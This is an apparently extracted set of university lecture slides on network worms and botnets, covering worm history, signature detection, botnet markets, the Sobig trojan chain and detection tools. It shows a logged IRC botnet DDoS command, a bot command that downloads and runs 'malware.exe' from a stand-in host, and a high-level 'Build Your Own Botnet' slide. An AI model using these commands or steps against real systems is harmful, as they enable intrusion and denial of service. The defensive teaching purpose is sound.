Transcript c - Mehran UET Scholars

Network Worms and Bots
Outline
Worms


Worm examples and propagation methods
Detection methods
 Traffic patterns: EarlyBird
 Vulnerabilities: Generic Exploit Blocking

Disabling worms
 Generate signatures for network or host-based filters
Bots



Structure and use of bots
Recognizing bot propagation
Recognizing bot operation
 Network-based methods
 Host-based methods
2
Worm
A worm is self-replicating software designed to
spread through the network


Typically, exploit security flaws in widely used services
Can cause enormous damage
 Launch DDOS attacks, install bot networks
 Access sensitive information
 Cause confusion by corrupting the sensitive information
Worm vs Virus vs Trojan horse



3
A virus is code embedded in a file or program
Viruses and Trojan horses rely on human intervention
Worms are self-contained and may spread autonomously
Cost of worm attacks
Morris worm, 1988

Infected approximately 6,000 machines
 10% of computers connected to the Internet

cost ~ $10 million in downtime and cleanup
Code Red worm, July 16 2001


Direct descendant of Morris’ worm
Infected more than 500,000 servers
 Programmed to go into infinite sleep mode July 28

Caused ~ $2.6 Billion in damages,
Love Bug worm: $8.75 billion
4
Statistics: Computer Economics Inc., Carlsbad, California
Internet Worm (First major attack)
Released November 1988


Program spread through Digital, Sun workstations
Exploited Unix security vulnerabilities
 VAX computers and SUN-3 workstations running versions
4.2 and 4.3 Berkeley UNIX code
Consequences


No immediate damage from program itself
Replication and threat of damage
 Load on network, systems used in attack
 Many systems shut down to prevent further attack
5
Some historical worms of note
6
Worm
Date
Distinction
Morris
11/88 Used multiple vulnerabilities, propagate to “nearby” sys
ADM
5/98
Random scanning of IP address space
Ramen
1/01
Exploited three vulnerabilities
Lion
3/01
Stealthy, rootkit worm
Cheese
6/01
Vigilante worm that secured vulnerable systems
Code Red
7/01
First sig Windows worm; Completely memory resident
Walk
8/01
Recompiled source code locally
Nimda
9/01
Windows worm: client-to-server, c-to-c, s-to-s, …
Scalper
6/02
11 days after announcement of vulnerability; peer-topeer network of compromised systems
Slammer
1/03
Used a single UDP packet for explosive growth
Kienzle and Elder
Increasing propagation speed
Code Red, July 2001

Affects Microsoft Index Server 2.0,
 Windows 2000 Indexing service on Windows NT 4.0.
 Windows 2000 that run IIS 4.0 and 5.0 Web servers


Exploits known buffer overflow in Idq.dll
Vulnerable population (360,000 servers) infected in 14 hours
SQL Slammer, January 2003


Affects in Microsoft SQL 2000
Exploits known buffer overflow vulnerability
 Server Resolution service vulnerability reported June 2002
 Patched released in July 2002 Bulletin MS02-39

7
Vulnerable population infected in less than 10 minutes
Code Red
Initial version released July 13, 2001



Sends its code as an HTTP request
HTTP request exploits buffer overflow
Malicious code is not stored in a file
 Placed in memory and then run
When executed,

Worm checks for the file C:\Notworm
 If file exists, the worm thread goes into infinite sleep state

Creates new threads
 If the date is before the 20th of the month, the next 99
threads attempt to exploit more computers by targeting
random IP addresses
8
Code Red of July 13 and July 19
Initial release of July 13

1st through 20th month: Spread
 via random scan of 32-bit IP addr space

20th through end of each month: attack.
 Flooding attack against 198.137.240.91 (www.whitehouse.gov)

Failure to seed random number generator  linear growth
Revision released July 19, 2001.



9
White House responds to threat of flooding attack by
changing the address of www.whitehouse.gov
Causes Code Red to die for date ≥ 20th of the month.
But: this time random number generator correctly seeded
Slides: Vern Paxson
Code Red 2
Released August 4, 2001.
Comment in code: “Code Red 2.”

But in fact completely different code base.
Payload: a root backdoor, resilient to reboots.
Bug: crashes NT, only works on Windows 2000.
Localized scanning: prefers nearby addresses.
Kills Code Red 1.
Safety valve: programmed to die Oct 1, 2001.
10
Slides: Vern Paxson
Striving for Greater Virulence: Nimda
Released September 18, 2001.
Multi-mode spreading:





attack IIS servers via infected clients
email itself to address book as a virus
copy itself across open network shares
modifying Web pages on infected servers w/ client
exploit
scanning for Code Red II backdoors (!)
worms form an ecosystem!
Leaped across firewalls.
11
Slides: Vern Paxson
Code Red 2 kills
off Code Red 1
CR 1
returns
thanks
to bad
clocks
12
Nimda enters the
ecosystem
Code Red 2 settles
into weekly pattern
Code Red 2 dies off
as programmed
Slides: Vern Paxson
How do worms propagate?
Scanning worms

Worm chooses “random” address
Coordinated scanning

Different worm instances scan different addresses
Flash worms

Assemble tree of vulnerable hosts in advance, propagate along tree
 Not observed in the wild, yet
 Potential for 106 hosts in < 2 sec ! [Staniford]
Meta-server worm

Ask server for hosts to infect (e.g., Google for “powered by phpbb”)
Topological worm:

Use information from infected hosts (web server logs, email address
books, config files, SSH “known hosts”)
Contagion worm

13
Propagate parasitically along with normally initiated communication
Worm Detection and Defense
Detect via honeyfarms: collections of “honeypots”

Any outbound connection from honeyfarm = worm.
(at least, that’s the theory)


Distill signature from inbound/outbound traffic.
If honeypot covers N addresses, expect detection when
worm has infected 1/N of population.
Thwart via scan suppressors: network elements that
block traffic from hosts that make failed connection
attempts to too many other hosts


14
5 minutes to several weeks to write a signature
Several hours or more for testing
Signature inference
Monitor network and look for strings common
to traffic with worm-like behavior

15
Signatures can then be used for content filtering
Slide: S Savage
Content sifting
Assume there exists some (relatively) unique
invariant bitstring W across all instances of a
particular worm (true today, not tomorrow...)
Two consequences


Content Prevalence: W will be more common in traffic
than other bitstrings of the same length
Address Dispersion: the set of packets containing W will
address a disproportionate number of distinct sources and
destinations
Content sifting: find W’s with high content prevalence
and high address dispersion and drop that traffic
16
Slide: S Savage
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
Prevalence Table
17
(Stefan
Savage, UCSD *)
D
Address Dispersion Table
Sources
Destinations
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
1
18
(Stefan
Savage, UCSD *)
Address Dispersion Table
Sources
Destinations
1 (A)
1 (B)
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
19
(Stefan
Savage, UCSD *)
1
1
Address Dispersion Table
Sources
Destinations
1 (A)
1 (C)
1 (B)
1 (A)
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
20
(Stefan
Savage, UCSD *)
2
1
Address Dispersion Table
Sources
Destinations
2 (A,B)
1 (C)
2 (B,D)
1 (A)
The basic algorithm
Detector in
network
A
B
C
cnn.com
E
D
Prevalence Table
21
(Stefan
Savage, UCSD *)
3
1
Address Dispersion Table
Sources
Destinations
3 (A,B,D)
3 (B,D,E)
1 (C)
1 (A)
Challenges
Computation

To support a 1Gbps line rate we have 12us to process each
packet, at 10Gbps 1.2us, at 40Gbps…
 Dominated by memory references; state expensive

Content sifting requires looking at every byte in a packet
State


On a fully-loaded 1Gbps link a naïve implementation can
easily consume 100MB/sec for table
Computation/memory duality: on high-speed (ASIC)
implementation, latency requirements may limit state to
on-chip SRAM
22
(Stefan
Savage, UCSD *)
Worm summary
Worm attacks



Many ways for worms to propagate
Propagation time is increasing
Polymorphic worms, other barriers to detection
Detect



Traffic patterns: EarlyBird
Watch attack: TaintCheck and Sting
Look at vulnerabilities: Generic Exploit Blocking
Disable

23
Generate worm signatures and use in network or
host-based filters
Botnet
Collection of compromised hosts


Spread like worms and viruses
Once installed, respond to remote commands
Platform for many attacks




Spam forwarding (70% of all spam?)
Click fraud
Keystroke logging
Distributed denial of service attacks
Serious problem

24

Top concern of banks, online merchants
Vint Cerf: ¼ of hosts connected to Internet
What are botnets used for?
capability
ago
DSNX
create port redirect
√
other proxy
√
download file from web
√
DNS resolution
√
UDP/ping floods
√
other DDoS floods
√
scan/spread
√
spam
√
visit URL
√
evil
G-SyS
sd
Spy
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
√
Capabilities are exercised via remote commands.
25
√
Building a Bot Network
compromise attempt
Attacker
compromise attempt
compromise attempt
compromise attempt
26
Win XP
FreeBSD
Mac OS X
Win XP
Building a Bot Network
compromise attempt
install bot software
Attacker
compromise attempt
compromise attempt
compromise attempt
install bot software
27
Win XP
compromised
FreeBSD
Mac OS X
Win XP
compromised
Step 2
Win XP
Win XP
Win XP
. . .
. . .
. . .
/connect
jade.va.us.dal.net
/connect
jade.va.us.dal.net
/connect
jade.va.us.dal.net
/join #hacker
/join #hacker
/join #hacker
. . .
. . .
. . .
jade.va.dal.net
28
Step 3
(12:59:27pm) -- A9-pcgbdv ([email protected])
has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected])
has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected])
has joined (#owned) Users : 1650
29
•
•
•
•
•
30
Spam service
Rent-a-bot
Cash-out
Pump and dump
Botnet rental
Underground commerce
Market in access to bots


Botherd: Collects and manages bots
Access to proxies (“peas”) sold to spammers, often with
commercial-looking web interface
Sample rates



Non-exclusive access to botnet: 10¢ per machine
Exclusive access: 25¢.
Payment via compromised account (eg PayPal) or cash to
dropbox
Identity Theft


Keystroke logging
Complete identities available for $25 - $200+
 Rates depend on financial situation of compromised person
 Include all info from PC files, plus all websites of interest with
passwords/account info used by PC owner
 At $200+, usually includes full credit report
31
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
Sobig.a In Action
Arrives as an email attachment


Written in C++
Encrypted with Telock to slow analysis
User opens attachment, launching trojan


Downloads file from a free Geocities account
Contains list of URLs pointing to second stage
Fetches second-stage trojan


32
Arbitrary executable file – could be anything
For Sobig.a, second-stage trojan is Lala
Stage 2 – Lala
Communication


Lala notifies a cgi script on a compromised host
Different versions of Lala have different sites and
cgi scripts, perhaps indicating tracking by author
Installation


Lala installs a keylogger and password-protected
Lithium remote access trojan.
Lala downloads Stage 3 trojan
 Wingate proxy (commercial software)
Cleanup

33
Lala removes the Sobig.a trojan
Stage 3 – Wingate
Wingate is a general-purpose port proxy server




555/TCP – RTSP
Service
1180/TCP – SOCKS
1182/TCP – WWW Proxy
1184/TCP – POP3 Proxy
608/TCP – Remote Control
1181/TCP – Telnet Proxy
1183/TCP – FTP Proxy
1185/TCP – SMTP Server
Final state of compromised machine

Complete remote control by Lithium client with password
“adm123”
Complete logging of user’s keystrokes
 Usable for spam relay, http redirects
 Wingate Gatekeeper client can connect to 608/TCP,
can log/change everything

34
Build Your Own Botnet
Pick a vector mechanism



IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
Scan & Sploit: MSBlast
Trojan:
SoBig/BugBear/ActiveX Exploits
Choose a Payload

Backdoors
Do it





 Agobot, SubSeven, DeepThroat
 Most include mechanisms for DDoS, Self-spreading, download/exec
arbitrary code, password stealers.
Compromise an IRC server, or use your own zombied machines
Configure Payload to connect to selected server
Load encryption keys and codes
Release through appropriate compromised systems
Sit back and wait, or start on your next Botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]
35
Bot detection methods
Signature-based (most AV products)
Rule-based


Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
Block certain ports (25, 6667, ...)
Hybrid: content-based filtering


Match network packet contents to known command strings (keywords)
E.g. Gaobot ddos cmds: .ddos.httpflood
Network traffic monitoring

Wenke Lee, Phil Porras: Bot Hunter, …
 Correlate various NIDS alarms to identify “bot infection sequence”


GA Tech: Recognize traffic patterns associated with ddns-based rallying
Stuart Staniford, FireEye
 Detect port scanning to identify suspicious traffic
 Emulate host with taint tracking to identify exploit
36
Introduction
Approaches to Privacy-Preserving Correlation
A Cyber-TA Distributed Correlation Example – botHunter
What is botHunter?
A Real Case Study
Behavior-based Correlation
Architectural Overview
BotHunter:
passive
What
is botHunter?
botHunter Sensors
Correlation Framework
Example botHunter Output
Cyber-TA Integration
bot detection
Snort-based sensor suite for malware event detection





inbound scan detection
remote to local exploit detection
anomaly detection system for exploits over key TCP
protocols
Botnet specific egg download banners,
Victim-to-C&C-based communications exchanges
 particularly for IRC bot protocols
Event correlator


37
combines information from sensors to recognize bots that
infect and coordinate with your internal network assets
Submits “bot-detection profiles” to the Cyber-TA repository
infrastructure
Botnets network traffic patterns
Unique characteristic: “rallying”



Bots spread like worms and trojans
Payloads may be common backdoors
Centralized control of botnet is characteristic feature
Georgia Tech idea: DNS



Bots installed at network edge
IP addresses may vary, use Dynamic DNS
Bots talk to controller, make DDNS lookup
 Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke
Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
38
BotSwat
Host-based bot detection
Based on idea of remote control commands
39
What does remote control look like?
http.execute <URL> <local_path>
Invoke system calls:

connect, network send and recv, create file, write file, …
On arguments received over the network:

IP to connect to, object to request, file name, …
Botswat premise


40
We can distinguish the behavior of bots from that of
innocuous processes via detecting “remote control”
We can approximate “remote control” as “using data
received over the network in a system call argument”
http.execute www.badguy.com/malware.exe C:\WIN\bad.exe
agobot
1
3
4
connect(…,www.badguy.com,…) 5
send( …,“…GET /malware.exe…”,…) 7
fcreate(…,“C:\WIN\malware.exe”,…) 8
2
Windows XP
41
NIC
6